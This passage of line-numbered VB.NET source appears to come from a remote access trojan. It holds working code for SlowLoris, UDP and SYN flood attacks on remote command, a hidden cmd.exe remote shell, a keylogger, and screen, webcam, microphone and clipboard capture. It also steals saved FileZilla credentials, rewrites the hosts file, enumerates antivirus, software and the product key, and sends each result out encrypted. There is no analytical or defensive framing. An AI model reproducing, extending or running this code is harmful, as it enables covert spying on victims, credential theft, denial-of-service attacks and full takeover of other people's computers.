656. ElseIf txt.StartsWith("HKEY_LOCAL_MACHINE") Then
657. txt = txt.Replace(txt.Split("\")(0) & "\", "")
658. Dim name As String = txt.Split("|")(1)
659. txt = txt.Replace("\|" & txt.Split("|")(1), "")
660. Dim regkey As RegistryKey = Registry.LocalMachine.OpenSubKey(txt, True)
661. regkey.DeleteValue(name)
662. regkey.Close()
663. End If
664. Catch
665. End Try
666. End Sub
667. Sub UploadFile(ByVal txt As String)
668. Try
669. 'MsgBox(txt.Split("|")(0))
670. 'IO.File.WriteAllBytes(txt.Split("|")(0), Convert.FromBase64String(txt.Replace(txt.Split("|")(0) & "|", "")))
671. Catch
672. End Try
673. End Sub
674. Sub StartSlowLoris(ByVal params As String)
675. Try
676. sl.Target = params.Split("|")(0)
677. sl.AOSockets = params.Split("|")(1)
678. sl.AOThreads = params.Split("|")(2)
679. sl.Start()
680. Catch
681. End Try
682. End Sub
683. Sub StartUDP(ByVal params As String)
684. Try
685. If UDPFlood.FloodRunning = True Then
686. Exit Sub
687. Else
688. UDPFlood.Host = params.Split("|")(0)
689. UDPFlood.Port = params.Split("|")(1)
690. UDPFlood.Threads = params.Split("|")(2)
691. UDPFlood.StartUDPFlood()
692. End If
693. Catch
694. End Try
695. End Sub
696. Sub StartSYN(ByVal params As String)
697. Try
698. If SynFlood.IsRunning = True Then
699. Exit Sub
700. Else
701. SynFlood.Host = params.Split("|")(0)
702. SynFlood.Port = params.Split("|")(1)
703. SynFlood.SynSockets = params.Split("|")(2)
704. SynFlood.Threads = params.Split("|")(3)
705. SynFlood.StartSynFlood()
706. End If
707. Catch
708. End Try
709. End Sub
710. Public Function HideTaskBar() As Boolean
711. Try
712. Dim lRet As Long
713. lRet = FindWindow("Shell_traywnd", "")
714. If lRet > 0 Then
715. lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
716. HideTaskBar = lRet > 0
717. End If
718. Return True
719. Catch
720. Return False
721. End Try
722. End Function
723. Public Function ShowTaskBar() As Boolean
724. Try
725. Dim lRet As Long
726. lRet = FindWindow("Shell_traywnd", "")
727. If lRet > 0 Then
728. lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_SHOWWINDOW)
729. ShowTaskBar = lRet > 0
730. End If
731. Return True
732. Catch
733. Return False
734. End Try
735. End Function
736. #End Region
737. #Region "Information Gathering"
738. #Region "Get Country"
739. <DllImport("kernel32.dll")> _
740. Private Shared Function GetLocaleInfo(ByVal Locale As UInteger, ByVal LCType As UInteger, <Out()> ByVal lpLCData As System.Text.StringBuilder, ByVal cchData As Integer) As Integer
741. End Function
742.  
743. Private Const LOCALE_SYSTEM_DEFAULT As UInteger = &H400
744. Private Const LOCALE_SENGCOUNTRY As UInteger = &H1002
745.  
746. Private Shared Function GetInfo() As String
747. Dim lpLCData As Object = New System.Text.StringBuilder(256)
748. Dim ret As Integer = GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_SENGCOUNTRY, lpLCData, lpLCData.Capacity)
749. If ret > 0 Then
750. Dim s As String = lpLCData.ToString().Substring(0, ret - 1)
751. Return UCase(s.Substring(0, 3))
752. End If
753. Return String.Empty
754. End Function
755. #End Region
756. Public Function getpriv() As String
757. Try
758. My.User.InitializeWithWindowsUser()
759.  
760. If My.User.IsAuthenticated() Then
761. If My.User.IsInRole(ApplicationServices.BuiltInRole.Administrator) Then
762. Return "Admin"
763. ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.User) Then
764. Return "User"
765. ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.Guest) Then
766. Return "Guest"
767. Else
768. Return "Unknown"
769. End If
770. End If
771. Return "Unknown"
772. Catch
773. Return "Unknown"
774. End Try
775. End Function
776. Sub sendprocess()
777. Dim p As New System.Diagnostics.Process()
778. Dim count As Integer = 0
779. Dim Listview1 As New ListView
780. For Each p In System.Diagnostics.Process.GetProcesses(My.Computer.Name)
781. On Error Resume Next
782. Listview1.Items.Add(p.ProcessName & ".exe")
783. Listview1.Items(count).SubItems.Add(FormatNumber(Math.Round(p.PrivateMemorySize64 / 1024), 0) & " K")
784. Listview1.Items(count).SubItems.Add(p.Responding)
785. Listview1.Items(count).SubItems.Add(p.StartTime.ToString().Trim)
786. Listview1.Items(count).SubItems.Add(p.Id)
787. count += 1
788. Next
789.  
790. Dim Items As String = ""
791. For Each item As ListViewItem In Listview1.Items
792. Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
793. Next
794. Items = Items.Trim
795.  
796. Send(AES_Encrypt("GetProcess" & Items, enckey))
797. End Sub
798. Sub getinstalledsoftware()
799. Try
800.  
801. Dim regkey, subkey As Microsoft.Win32.RegistryKey
802. Dim value As String
803. Dim regpath As String = "Software\Microsoft\Windows\CurrentVersion\Uninstall"
804. Dim software As String = String.Empty
805. Dim softwarecount As Integer
806.  
807. regkey = My.Computer.Registry.LocalMachine.OpenSubKey(regpath)
808. Dim subkeys() As String = regkey.GetSubKeyNames
809. Dim includes As Boolean
810. For Each subk As String In subkeys
811. subkey = regkey.OpenSubKey(subk)
812. value = subkey.GetValue("DisplayName", "")
813. If value <> "" Then
814. includes = True
815. If value.IndexOf("Hotfix") <> -1 Then includes = False
816. If value.IndexOf("Security Update") <> -1 Then includes = False
817. If value.IndexOf("Update for") <> -1 Then includes = False
818. If includes = True Then
819. software += value & "|" & vbCrLf
820. softwarecount += 1
821. End If
822. End If
823. Next
824.  
825. Dim final As String = "Software|" & softwarecount & "|" & software
826. Send(AES_Encrypt(final, enckey))
827. Catch
828. End Try
829. End Sub
830. #Region "System Information"
831. Function getsystem() As String
832. Try
833. Return SystemInformation.ComputerName.ToString() & "|" & _
834. SystemInformation.UserName.ToString() & "|" & _
835. SystemInformation.VirtualScreen.Width & "|" & _
836. SystemInformation.VirtualScreen.Height & "|" & _
837. FormatNumber(My.Computer.Info.AvailablePhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
838. FormatNumber(My.Computer.Info.AvailableVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
839. My.Computer.Info.OSFullName & "|" & _
840. My.Computer.Info.OSPlatform & "|" & _
841. My.Computer.Info.OSVersion & "|" & _
842. FormatNumber(My.Computer.Info.TotalPhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
843. FormatNumber(My.Computer.Info.TotalVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
844. SystemInformation.PowerStatus.BatteryChargeStatus.ToString() & "|" & _
845. SystemInformation.PowerStatus.BatteryFullLifetime.ToString() & "|" & _
846. SystemInformation.PowerStatus.BatteryLifePercent.ToString() & "|" & _
847. SystemInformation.PowerStatus.BatteryLifeRemaining.ToString() & "|" & _
848. GetCPUInfo() & "|" & GetGPUName() & "|" & _
849. "(Started: " & StartUp() & ") & (Uptime: " & getUptime() & ")"
850. Catch
851. Return "N/A"
852. End Try
853. End Function
854. Private Function StartUp() As String
855. Try
856. Dim StartDate As DateTime
857. Dim envTicks As Long = Environment.TickCount
858. Dim msToAdd As Long = envTicks - (envTicks * 2)
859. StartDate = DateTime.Now.AddMilliseconds(msToAdd)
860. Return StartDate.ToString
861. Catch
862. Return Nothing
863. End Try
864. End Function
865. Public Function getUptime() As String
866. Try
867. Dim time As String = String.Empty
868. time += Math.Round(Environment.TickCount / 86400000) & " days, "
869. time += Math.Round(Environment.TickCount / 3600000 Mod 24) & " hours, "
870. time += Math.Round(Environment.TickCount / 120000 Mod 60) & " minutes, "
871. time += Math.Round(Environment.TickCount / 1000 Mod 60) & " seconds."
872. Return time
873. Catch
874. Return Nothing
875. End Try
876. End Function
877. Private Function GetCPUInfo() As String
878. Try
879. Dim cpuName As String = Microsoft.Win32.Registry.LocalMachine.OpenSubKey("HARDWARE\DESCRIPTION\System\CentralProcessor\0").GetValue("ProcessorNameString")
880. Return cpuName.Replace(" ", " ").Replace(" ", " ")
881. Catch
882. Return Nothing
883. End Try
884. End Function
885. Private Function GetGPUName() As String
886. Dim GraphicsCardName As String = String.Empty
887. Try
888. Dim WmiSelect As New ManagementObjectSearcher _
889. ("root\CIMV2", "SELECT * FROM Win32_VideoController")
890. For Each WmiResults As ManagementObject In WmiSelect.Get()
891. GraphicsCardName = WmiResults.GetPropertyValue("Name").ToString
892. If (Not String.IsNullOrEmpty(GraphicsCardName)) Then
893. Exit For
894. End If
895. Next
896. Catch err As ManagementException
897. End Try
898. Return GraphicsCardName
899. End Function
900. #End Region
901. #Region "Deep Information"
902. Function GetDeepInfo() As String
903. Try
904. Dim devices As String = String.Empty
905.  
906. Dim strName As String = Space(100)
907. Dim strVer As String = Space(100)
908. Dim bReturn As Boolean
909. Dim x As Integer = 0
910. Do
911. bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
912. If bReturn Then devices += strName.Trim & "|"
913. x += 1
914. Loop Until bReturn = False
915.  
916. Dim res As String = String.Empty
917. If devices <> "" Then
918. res = "Yes" : Else : res = "No"
919. End If
920.  
921. Return "|" & My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOwner", "N/A") & "|" & _
922. My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOrganization", "N/A") & "|" & _
923. My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Win8", "ProductKey", "N/A") & "|" & NetworkInterface.GetAllNetworkInterfaces()(0).GetPhysicalAddress().ToString & "|" & _
924. res & "|" & GetAV() & "|" & Application.ExecutablePath
925. Catch
926. Return ""
927. End Try
928. End Function
929. Function GetAV() As String
930. Dim wmiQuery As Object = "Select * From AntiVirusProduct"
931. Dim objWMIService As Object = GetObject("winmgmts:\\.\root\SecurityCenter2")
932. Dim colItems As Object = objWMIService.ExecQuery(wmiQuery)
933. For Each objItem As Object In colItems
934. On Error Resume Next
935. Return objItem.displayName.ToString()
936. Next
937. Return Nothing
938. End Function
939. #End Region
940. Function GetTCPConnections() As String
941. Try
942. Dim s As String = String.Empty
943.  
944. Dim properties As IPGlobalProperties = IPGlobalProperties.GetIPGlobalProperties()
945. Dim connections() As TcpConnectionInformation = properties.GetActiveTcpConnections()
946.  
947. For Each c As TcpConnectionInformation In connections
948. s += String.Format("{0}|{1}|{2}", c.LocalEndPoint, c.RemoteEndPoint, c.State) & vbCrLf
949. Next
950.  
951. Return s.Trim
952. Catch
953. Return Nothing
954. End Try
955. End Function
956. Private Sub GetStartupEntries()
957. Try
958. Dim x As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
959.  
960. Dim dir As DirectoryInfo = New DirectoryInfo(x)
961. Dim files() As FileInfo = dir.GetFiles
962.  
963. Dim regkeys(3) As RegistryKey
964.  
965. regkeys(0) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
966. regkeys(1) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
967. regkeys(2) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
968. regkeys(3) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
969.  
970. Dim result As String = String.Empty
971.  
972. For Each File As FileInfo In files
973. result += String.Format("{0}|{1}|{2}", x, File.Name, x & "\" & File.Name) & vbCrLf
974. Next
975.  
976. For i As Integer = 0 To 3
977. For Each valueName As String In regkeys(i).GetValueNames()
978. result += String.Format("{0}|{1}|{2}", regkeys(i).ToString, valueName, regkeys(i).GetValue(valueName)) & vbCrLf
979. Next
980. Next
981.  
982. result = result.Trim
983. Send(AES_Encrypt("Strtp" & result, enckey))
984. Catch
985. End Try
986. End Sub
987. Sub SendServices()
988. Dim Listview1 As New ListView
989. Dim scServices() As ServiceController = ServiceController.GetServices()
990.  
991. For i As Integer = 0 To UBound(scServices)
992. With ListView1.Items.Add(scServices(i).ServiceName)
993. .SubItems.Add(scServices(i).DisplayName)
994. .SubItems.Add(scServices(i).ServiceType.ToString)
995. .SubItems.Add(scServices(i).Status.ToString)
996. End With
997. Next
998.  
999. Dim Items As String = ""
1000. For Each item As ListViewItem In Listview1.Items
1001. Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & vbNewLine
1002. Next
1003. Items = Items.Trim
1004.  
1005. Send(AES_Encrypt("Services" & Items, enckey))
1006. End Sub
1007. Sub PerformServiceAction(Byval number As Integer, Byval Action As String)
1008. Try
1009. Dim scServices() As ServiceController = ServiceController.GetServices()
1010. Select Case Action
1011. Case "Close"
1012. scServices(number).Close()
1013. Case "Continue"
1014. scServices(number).Continue()
1015. Case "Pause"
1016. scServices(number).Pause()
1017. Case "Start"
1018. scServices(number).Start()
1019. Case "Stop"
1020. scServices(number).Stop()
1021. End Select
1022. Catch : End Try
1023. End Sub
1024. #End Region
1025. #Region "Encryption"
1026. Public Function AES_Encrypt(ByVal input As String, ByVal pass As String) As String
1027. Dim AES As New System.Security.Cryptography.RijndaelManaged
1028. Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
1029. Dim encrypted As String = ""
1030. Try
1031. Dim hash(31) As Byte
1032. Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
1033. Array.Copy(temp, 0, hash, 0, 16)
1034. Array.Copy(temp, 0, hash, 15, 16)
1035. AES.Key = hash
1036. AES.Mode = System.Security.Cryptography.CipherMode.ECB
1037. Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
1038. Dim Buffer As Byte() = System.Text.ASCIIEncoding.ASCII.GetBytes(input)
1039. encrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
1040. Return encrypted
1041. Catch
1042. Return Nothing
1043. End Try
1044. End Function
1045. Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
1046. Dim AES As New System.Security.Cryptography.RijndaelManaged
1047. Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
1048. Dim decrypted As String = ""
1049. Try
1050. Dim hash(31) As Byte
1051. Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
1052. Array.Copy(temp, 0, hash, 0, 16)
1053. Array.Copy(temp, 0, hash, 15, 16)
1054. AES.Key = hash
1055. AES.Mode = System.Security.Cryptography.CipherMode.ECB
1056. Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
1057. Dim Buffer As Byte() = Convert.FromBase64String(input)
1058. decrypted = System.Text.ASCIIEncoding.ASCII.GetString(DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
1059. Return decrypted
1060. Catch
1061. Return Nothing
1062. End Try
1063. End Function
1064. #End Region
1065. #Region "Surveillance"
1066. #Region "Remote Desktop"
1067. Sub sendscreen()
1068. Try
1069.  
1070. Dim width As Integer = res.Split("x")(0)
1071. Dim height As Integer = res.Split("x")(1)
1072.  
1073. Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1074. Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1075. g.CopyFromScreen(0, 0, 0, 0, b.Size)
1076. g.Dispose()
1077.  
1078. Dim p, pp As New PictureBox
1079. p.Image = b
1080. Dim img As System.Drawing.Image = p.Image
1081. pp.Image = img.GetThumbnailImage(width, height, Nothing, Nothing)
1082. Dim img2 As System.Drawing.Image = pp.Image
1083.  
1084. Dim bmp1 As New System.Drawing.Bitmap(img2)
1085. Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1086. Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1087. Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1088. Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, comp)
1089. myEncoderParameters.Param(0) = myEncoderParameter
1090. bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg", jgpEncoder, myEncoderParameters)
1091. Send(AES_Encrypt("RemoteDesktop" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")), enckey))
1092. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")
1093. Catch
1094. End Try
1095. End Sub
1096. Private Function GetEncoder(ByVal format As System.Drawing.Imaging.ImageFormat) As System.Drawing.Imaging.ImageCodecInfo
1097. Try
1098. Dim codecs As System.Drawing.Imaging.ImageCodecInfo() = System.Drawing.Imaging.ImageCodecInfo.GetImageDecoders()
1099. Dim codec As System.Drawing.Imaging.ImageCodecInfo
1100. For Each codec In codecs
1101. If codec.FormatID = format.Guid Then
1102. Return codec
1103. End If
1104. Next codec
1105. Return Nothing
1106. Catch
1107. Return Nothing
1108. End Try
1109. End Function
1110. #End Region
1111. Sub MouseMov(ByVal txt As String)
1112. Try
1113. If txt.StartsWith("Left") Then
1114. Dim x As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(0)
1115. Dim y As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(1)
1116.  
1117. SetCursorPos(x, y)
1118. mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
1119. mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
1120. ElseIf txt.StartsWith("Right") Then
1121. Dim x As Integer = txt.Replace("RightSetCurPos", "").Split("x")(0)
1122. Dim y As Integer = txt.Replace("RightSetCurPos", "").Split("x")(1)
1123.  
1124. SetCursorPos(x, y)
1125. mouse_event(MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
1126. mouse_event(MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)
1127. End If
1128. Catch
1129. End Try
1130. End Sub
1131. #Region "Audio"
1132. Sub audio_start()
1133. Try
1134. Dim i As Integer
1135. i = mciSendString("open new type waveaudio alias capture", Nothing, 0, 0)
1136. i = mciSendString("record capture", Nothing, 0, 0)
1137. Catch
1138. End Try
1139. End Sub
1140. Sub audio_stop()
1141. Try
1142. Dim i As Integer
1143. i = mciSendString("save capture " & My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\rec.wav", Nothing, 0, 0)
1144. i = mciSendString("close capture", Nothing, 0, 0)
1145. Catch
1146. End Try
1147. End Sub
1148. Sub audio_get()
1149. Try
1150. Send(AES_Encrypt("RecordingFile" & SystemInformation.ComputerName & "|" & Convert.ToBase64String(File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")), enckey))
1151. File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")
1152. Catch
1153. End Try
1154. End Sub
1155. #End Region
1156. #Region "Webcam"
1157. Sub listdevices()
1158. Try
1159. Dim devices As String = String.Empty
1160.  
1161. Dim strName As String = Space(100)
1162. Dim strVer As String = Space(100)
1163. Dim bReturn As Boolean
1164. Dim x As Integer = 0
1165. Do
1166. bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
1167. If bReturn Then devices += strName.Trim & "|"
1168. x += 1
1169. Loop Until bReturn = False
1170. Send(AES_Encrypt("WebcamDevices" & devices, enckey))
1171. Catch
1172. End Try
1173. End Sub
1174. Sub getwebcam()
1175. Try
1176. Dim iHeight As Integer = picCapture.Height
1177. Dim iWidth As Integer = picCapture.Width
1178. hHwnd = capCreateCaptureWindowA(iDevice, WS_VISIBLE Or WS_CHILD, 0, 0, 640, 480, picCapture.Handle.ToInt32, 0)
1179.  
1180. If SendWebcam(hHwnd, WM_CAP_DRIVER_CONNECT, iDevice, 0) Then
1181. SendWebcam(hHwnd, WM_CAP_SET_SCALE, True, 0)
1182. SendWebcam(hHwnd, WM_CAP_SET_PREVIEWRATE, 66, 0)
1183. SendWebcam(hHwnd, WM_CAP_SET_PREVIEW, True, 0)
1184. SetWebcamPos(hHwnd, HWND_BOTTOM, 0, 0, picCapture.Width, picCapture.Height, SWP_NOMOVE Or SWP_NOZORDER)
1185.  
1186. Dim data As IDataObject
1187. Dim bmap As System.Drawing.Image
1188. SendWebcam(hHwnd, WM_CAP_EDIT_COPY, 0, 0)
1189. data = Clipboard.GetDataObject()
1190. If data.GetDataPresent(GetType(System.Drawing.Bitmap)) Then
1191. bmap = CType(data.GetData(GetType(System.Drawing.Bitmap)), System.Drawing.Image)
1192. picCapture.Image = bmap
1193.  
1194. SendWebcam(hHwnd, WM_CAP_DRIVER_DISCONNECT, iDevice, 0)
1195.  
1196. bmap.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png", System.Drawing.Imaging.ImageFormat.Png)
1197. Send(AES_Encrypt("WebcamSnap" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")), enckey))
1198. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")
1199. End If
1200. Else
1201. DestroyWebcam(hHwnd)
1202. End If
1203. Catch
1204. End Try
1205. End Sub
1206. #End Region
1207. Sub SendThumbNail()
1208. Try
1209.  
1210. Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1211. Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1212. g.CopyFromScreen(0, 0, 0, 0, b.Size)
1213. g.Dispose()
1214.  
1215. Dim p, pp As New PictureBox
1216. p.Image = b
1217. Dim img As System.Drawing.Image = p.Image
1218. pp.Image = img.GetThumbnailImage(242, 152, Nothing, Nothing)
1219. Dim img2 As System.Drawing.Image = pp.Image
1220.  
1221. Dim bmp1 As New System.Drawing.Bitmap(img2)
1222. Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1223. Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1224. Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1225. Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, 100L)
1226. myEncoderParameters.Param(0) = myEncoderParameter
1227. bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg", jgpEncoder, myEncoderParameters)
1228. Send(AES_Encrypt("ThumbNail" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")), enckey))
1229. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")
1230. Catch
1231. End Try
1232. End Sub
1233. #End Region
1234. #Region "Miscellaneous"
1235. Sub loadhostsfile()
1236. Try
1237. Send(AES_Encrypt("HostsFile" & IO.File.ReadAllText("C:\Windows\system32\drivers\etc\hosts"), enckey))
1238. Catch
1239. End Try
1240. End Sub
1241. Sub savehostsfile(ByVal txt As String)
1242. Try
1243. IO.File.WriteAllText("C:\Windows\system32\drivers\etc\hosts", txt)
1244. Catch
1245. End Try
1246. End Sub
1247. Sub getclipboardimage()
1248. Try
1249. If My.Computer.Clipboard.ContainsImage() Then
1250. Dim img As New PictureBox
1251. img.Image = My.Computer.Clipboard.GetImage()
1252. img.Image.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1253. Else
1254. Dim Bmp As New System.Drawing.Bitmap(397, 187, Imaging.PixelFormat.Format32bppPArgb)
1255. Bmp.SetResolution(397, 187)
1256. Dim G As System.Drawing.Graphics = Graphics.FromImage(Bmp)
1257. G.Clear(Color.White)
1258. G.InterpolationMode = Drawing2D.InterpolationMode.HighQualityBicubic
1259. G.SmoothingMode = Drawing2D.SmoothingMode.AntiAlias
1260. G.TextRenderingHint = Drawing.Text.TextRenderingHint.AntiAlias
1261. Dim F As New Font("Arial", 3)
1262. Dim B As New SolidBrush(Color.Red)
1263. G.DrawString("The Clipboard does not have any Images!", F, B, 12, 12)
1264.  
1265. Bmp.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1266. End If
1267.  
1268. Send(AES_Encrypt("CPImage" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")), enckey))
1269. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1270. Catch
1271. End Try
1272. End Sub
1273. Sub getclipboardtext()
1274. Try
1275. If My.Computer.Clipboard.ContainsText() = True Then
1276. Send(AES_Encrypt("CPText" & My.Computer.Clipboard.GetText(), enckey))
1277. End If
1278. Catch
1279. End Try
1280. End Sub
1281. Sub setclipboardtext(ByVal text As String)
1282. Try
1283. My.Computer.Clipboard.SetText(text)
1284. Catch
1285. End Try
1286. End Sub
1287. Sub runshell(cmd As String)
1288. Try
1289. Dim p As New System.Diagnostics.Process
1290. Dim i As New System.Diagnostics.ProcessStartInfo("cmd")
1291. i.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
1292. i.Arguments = "/C " & cmd
1293. i.RedirectStandardOutput = True
1294. i.UseShellExecute = False
1295. i.CreateNoWindow = True
1296. i.ErrorDialog = False
1297. p.StartInfo = i
1298. p.Start()
1299. Dim output As String = p.StandardOutput.ReadToEnd
1300.  
1301. Send(AES_Encrypt("Shell" & output, enckey))
1302. Catch
1303. End Try
1304. End Sub
1305. #End Region
1306. #Region "Keylogger"
1307. Private Function GetActiveWindowTitle() As String
1308. Dim MyStr As String
1309. MyStr = New String(Chr(0), 100)
1310. GetWindowText(GetForegroundWindow, MyStr, 100)
1311. MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
1312. Return MyStr
1313. End Function
1314. Private Sub logger_Down(Key As String) Handles logger.Down
1315. Call APPU()
1316. logs &= Key
1317. End Sub
1318. Sub APPU()
1319. If strin <> GetActiveWindowTitle() Then
1320. logs = logs & vbCrLf & vbCrLf & "[" & My.Computer.Clock.LocalTime.Date & " " & My.Computer.Clock.LocalTime.Hour & ":" & My.Computer.Clock.LocalTime.Minute & ":" & My.Computer.Clock.LocalTime.Second & " | " & GetActiveWindowTitle() & "]" + vbNewLine & vbNewLine
1321. strin = GetActiveWindowTitle()
1322. End If
1323. End Sub
1324. #End Region
1325. Function FileZilla() As Object
1326. Try
1327. Dim O As String() = Split(IO.File.ReadAllText(Environ("APPDATA") & "\FileZilla\recentservers.xml"), "<Server>")
1328. Dim OL As String = Nothing
1329.  
1330. For Each u As String In O
1331. Dim UU() As String = Split(u, vbNewLine)
1332. For Each I As String In UU
1333. If I.Contains("<Host>") Then
1334. OL += Split(Split(I, "<Host>")(1), "</Host>")(0)
1335. End If
1336. If I.Contains("<Port>") Then
1337. OL += ":" & Split(Split(I, "<Port>")(1), "</Port>")(0) & "|FileZilla"
1338. End If
1339. If I.Contains("<User>") Then
1340. OL += "|" & Split(Split(I, "<User>")(1), "</User>")(0)
1341. End If
1342. If I.Contains("<Pass>") Then
1343. OL += "|" & Split(Split(I, "<Pass>")(1), "</Pass>")(0) & vbCrLf
1344. End If
1345. Next
1346. Next
1347. Return OL
1348. Catch
1349. Return ""
1350. End Try
1351. End Function
1352. #Region "FileManager"
1353. Sub listdrives()
1354. Try
1355. Dim drives As String = String.Empty
1356. For Each drive As IO.DriveInfo In IO.DriveInfo.GetDrives
1357. Dim ltr As String = drive.Name
1358. If drive.IsReady AndAlso drive.VolumeLabel <> "" Then
1359. Else
1360. End If
1361. drives += ltr & "|"
1362. Next
1363. Send(AES_Encrypt("Drives" & drives, enckey))
1364. Catch
1365. End Try
1366. End Sub
1367. Sub showfiles(path As String)
1368. Try
1369. listviewfiles.Items.Clear()
1370. curntdir2 = ""
1371. For Each Dir As String In Directory.GetDirectories(path)
1372. Dir = Dir.Replace(path, "")
1373. Dim d As New DirectoryInfo(path & Dir & "\")
1374. With listviewfiles.Items.Add(Dir, 0)
1375. .SubItems.Add(d.CreationTime)
1376. .SubItems.Add(d.LastAccessTime)
1377. .SubItems.Add("")
1378. .SubItems.Add("1")
1379. End With
1380. Next
1381.  
1382. Dim file As String
1383. file = Dir$(path)
1384. Do While Len(file)
1385. Dim f As New FileInfo(path & file)
1386. With listviewfiles.Items.Add(file)
1387. .SubItems.Add(f.CreationTime)
1388. .SubItems.Add(f.LastAccessTime)
1389. .SubItems.Add(Format((f.Length / 1024) / 1024, "###,###,##0.00") & " MB")
1390. .SubItems.Add("0")
1391. End With
1392. file = Dir$()
1393. Loop
1394. curntdir2 = path
1395.  
1396. Dim Items As String = curntdir2 & "|"
1397. For Each item As ListViewItem In listviewfiles.Items
1398. Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
1399. Next
1400. Items = Items.Trim
1401.  
1402. Send(AES_Encrypt("FileManagerFiles" & Items, enckey))
1403. Catch
1404. End Try
1405. End Sub
1406. Sub createnewdirectory(ByVal path As String)
1407. Try
1408. My.Computer.FileSystem.CreateDirectory(path)
1409. Catch
1410. End Try
1411. End Sub
1412. Sub deletedirectory(ByVal path As String)
1413. Try
1414. My.Computer.FileSystem.DeleteDirectory(path, FileIO.DeleteDirectoryOption.DeleteAllContents)
1415. Catch
1416. End Try
1417. End Sub
1418. Sub renamedirectory(ByVal path As String, ByVal newname As String)
1419. Try
1420. My.Computer.FileSystem.RenameDirectory(path, newname)
1421. Catch
